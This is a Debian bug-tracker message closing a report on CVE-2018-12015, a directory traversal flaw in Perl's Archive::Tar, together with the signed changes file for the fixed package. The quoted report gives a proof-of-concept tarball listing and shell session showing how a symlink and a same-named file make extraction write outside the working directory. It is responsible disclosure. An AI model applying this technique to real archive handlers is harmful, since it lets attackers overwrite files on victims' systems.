Bug#900834: marked as done (perl: CVE-2018-12015: Archive::Tar: directory traversal)

Debian Bug Tracking System Tue, 12 Jun 2018 12:37:23 -0700

Your message dated Tue, 12 Jun 2018 19:33:56 +0000
with message-id <e1fsp3e-000cuj...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.20.2-3+deb8u11
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is:
  $ tar -tvvf traversal.tar.gz
  lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
  -rw-r--r-- root/root         4 2018-06-05 18:55 moo

  $ pwd
  /home/jwilk

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'

  $ ls /tmp/moo
  /tmp/moo

--
Jakub Wilk
traversal.tar.gz
Description: application/gzip

--- End Message ---

--- Begin Message ---

Source: perl
Source-Version: 5.20.2-3+deb8u11

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <d...@earth.li> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sun, 10 Jun 2018 18:40:37 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.20 libperl-dev perl-modules perl
Architecture: all amd64 source
Version: 5.20.2-3+deb8u11
Distribution: jessie-security
Urgency: high
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Dominic Hargreaves <d...@earth.li>
Closes: 900834
Description: 
 libperl5.20 - shared Perl library
 libperl-dev - Perl library: development files
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-modules - Core Perl modules
Changes:
 perl (5.20.2-3+deb8u11) jessie-security; urgency=high
 .
   * [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
     in Archive-Tar (Closes: #900834)
Checksums-Sha1: 
 260b78682d66f64ff569e4e6822e1454b4a60bd8 2377 perl_5.20.2-3+deb8u11.dsc
 4348cadb494865efac6dcd7389cccb6d5f4d33e8 157516 
perl_5.20.2-3+deb8u11.debian.tar.xz
 72c32508e322dfd1555013ce3ffba23ac418a3f2 5147 
perl_5.20.2-3+deb8u11_source.buildinfo
 0aeb49c28f19258d17f7a4f963b80fc98f5c6990 7346632 
perl-doc_5.20.2-3+deb8u11_all.deb
 fae1d268e75a3d4dbc4c2e6c50991db67f11ec88 2547456 
perl-modules_5.20.2-3+deb8u11_all.deb
 3010976f133222abbb1e08880bf72bd8620f97ec 1229672 
perl-base_5.20.2-3+deb8u11_amd64.deb
 a92d835f7a7bee9a800907b060f00c354ec7690e 4481682 
perl-debug_5.20.2-3+deb8u11_amd64.deb
 7a7b712bf3abcf5755bcb6faf462bed874bcd010 1362 
libperl5.20_5.20.2-3+deb8u11_amd64.deb
 94a97f170fc73b83cf9dfbd6ae9d0741fea2c95b 2147888 
libperl-dev_5.20.2-3+deb8u11_amd64.deb
 6db1773b7a6edcf6c0c9dbc54ba8921a4ec468cc 2642044 
perl_5.20.2-3+deb8u11_amd64.deb
Checksums-Sha256: 
 b58df3f05201f9a474157fbf3ede9d4b08beb8b3b69a882bb2c3f14eb70c1a40 2377 
perl_5.20.2-3+deb8u11.dsc
 53e0ccd3ed238614fbcd8eb577159392892bcf82c7821f94f6ef379e8ae3a7c1 157516 
perl_5.20.2-3+deb8u11.debian.tar.xz
 c03a8c7af62d41cf1da5dd33c0dc109697a20900b7110a6fb4492f5bba20b2ac 5147 
perl_5.20.2-3+deb8u11_source.buildinfo
 c7e958ce7fb35fcb17792a130db54e21d4ea29e173eae2b509f899633d23e704 7346632 
perl-doc_5.20.2-3+deb8u11_all.deb
 22cb948fe3a60ff0bfdfc24aeebbf47fb0fee34fd3c68b9d10e4af76bb331ec9 2547456 
perl-modules_5.20.2-3+deb8u11_all.deb
 dcc2bcb06313ab37fc3ed9da253d39a516bf48245e60426eee4023ee1961e7e9 1229672 
perl-base_5.20.2-3+deb8u11_amd64.deb
 67196a8a0fa2be987f874d9c8e43b81d69c244a6d7f1170bb0c2a58c031453e0 4481682 
perl-debug_5.20.2-3+deb8u11_amd64.deb
 e80d6d17a10777854f14b1fb40eea74558c1a2974cb52c13c750d0b3e90cca02 1362 
libperl5.20_5.20.2-3+deb8u11_amd64.deb
 c77acfe009897647825b46324670ebbb7f391f2a49cb7c82429dd6cb4dd64585 2147888 
libperl-dev_5.20.2-3+deb8u11_amd64.deb
 bf2d580fea43dd9680d1d8706c8d2330ebbac07905f619a5ed546045d2a71c09 2642044 
perl_5.20.2-3+deb8u11_amd64.deb
Files: 
 19957ef3cf7a45d31b5dd1df826af9d6 2377 perl standard perl_5.20.2-3+deb8u11.dsc
 7340e4dcd6e352c3ec4060f88c3671fe 157516 perl standard 
perl_5.20.2-3+deb8u11.debian.tar.xz
 d9e687773fc5037046997916c75738e8 5147 perl standard 
perl_5.20.2-3+deb8u11_source.buildinfo
 2f906f8d86d367e54f86e3d5be6b32c5 7346632 doc optional 
perl-doc_5.20.2-3+deb8u11_all.deb
 23a65d50552be175e0d747872f5e81b8 2547456 perl standard 
perl-modules_5.20.2-3+deb8u11_all.deb
 bd3165838cff015d4f5b36fdeb0552e5 1229672 perl required 
perl-base_5.20.2-3+deb8u11_amd64.deb
 e465128ea170fad325de91443849b398 4481682 debug extra 
perl-debug_5.20.2-3+deb8u11_amd64.deb
 b8db73d0f81ccad412aa6214abd2e925 1362 libs optional 
libperl5.20_5.20.2-3+deb8u11_amd64.deb
 0fc5aad2a417c405283921486c28aeea 2147888 libdevel optional 
libperl-dev_5.20.2-3+deb8u11_amd64.deb
 7b9fa8e72618a1085a0870f98b9c6eca 2642044 perl standard 
perl_5.20.2-3+deb8u11_amd64.deb

-----BEGIN PGP SIGNATURE-----

iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsdctsNHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPsuCED/98MxFFupaH/s9mb7CxOMtv3/whh/I9OT9l38gW
9x95YIeAPbzVoh5HcwbYUm3fsEkQCIIv6rVVBggFMMm0bILgIfNPAA80xkqFGD98
0HWx662zKXhZbhuR/5ZEK6peiSXZGvN49e4kOU94GQ8dp/H2Os3LZfCHHrCSnCKp
R9yy5g3z+l/mw5v5f6RJVlaCjbvMIgcX/u2YqF0jGPj1kFJCnYknS/rZQZYcLIs8
r/ziIjqL4E1uqPSvEOLAs5eQ2HMircihvIywPxtm6rbnlinadcvkl3ZwGx/r6z90
0D5er3MLFr67FSg+ENdxBtT8nKUdgdJvaABC30RruIWNWvf4G77aYOM+rIdbsch9
+5Mjm7OD0A2wIaHnXbo5CrpjJcQ2eTvwkY9bj8wCmXgysmLaG6/3tbTnJF/CTBSv
+SyXt/F8GTDxKLiZ4I4irbOpASUjQ7rsdGy+x7zsritSemG7v7vrqXqHDdPSAa11
K+JCJb+tl34Hh+InzkrGNhRWWBBdxq/+wmStfbcHftS7gCGqjxAc7bWmNnEiv/zy
7zWNnJ+UHTIJ7Dp5pLcrNeTCBTDMWJAqblfYjRfh5gWln2RlA97mPh2yi9Lv9zb2
3HBmNEyGZP3hM8ADYNzVzwoE0YeiGrJI8jq6yw9+rMfrng0ImkgezVBRT32noqq+
9Xtjfw==
=hrqL
-----END PGP SIGNATURE-----

--- End Message ---

Bug#900834: marked as done (perl: CVE-2018-12015: Archive::Tar: directory traversal)

Reply via email to